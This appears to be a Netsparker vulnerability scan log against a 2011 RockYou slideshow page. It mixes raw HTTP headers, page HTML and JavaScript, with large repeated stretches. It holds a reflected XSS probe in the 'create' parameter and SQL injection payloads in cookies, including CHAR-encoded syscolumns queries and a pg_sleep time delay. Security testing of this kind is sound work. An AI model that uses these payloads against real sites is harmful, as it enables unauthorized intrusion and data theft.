<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '3';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "br";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSections();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); var slidelist = []; slidePrint(slidelist); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = ["","mokina"]; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source=br&create='%22%3E%3Cnet%20sparker=netsparker(0x0025B0)%3E&instanceid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") ..
Date: Mon, 18 Apr 2011 22:36:25 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:36:24 GMT; path=/; domain=.rockyou.com,lastlogin=1303166185; expires=Wed, 27-Jul-2011 22:36:25 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:36:25 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:36:25 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:36:25 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=29086 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26941
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '3';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "br";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSections();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); var slidelist = []; slidePrint(slidelist); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = ["","mokina"]; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source=br&create='%22%3E%3Cnet%20sparker=netsparker(0x0025B0)%3E&instanceid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") ..
|
- /slideshow-create.php
/slideshow-create.php |
Parameters
| Parameter | Type | Value |
| refid | GET | 3 |
| create | GET | '"><net sparker=alert(0x0025BE)> |
| instanceid | GET | 3 |
Request
GET /slideshow-create.php?refid=3&create='%22%3E%3Cnet%20sparker=netsparker(0x0025BE)%3E&instanceid=3 HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166426; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166426; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:40:27 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:40:26 GMT; path=/; domain=.rockyou.com,lastlogin=1303166427; expires=Wed, 27-Jul-2011 22:40:27 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:40:27 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:40:27 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:40:27 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=28768 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26934
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
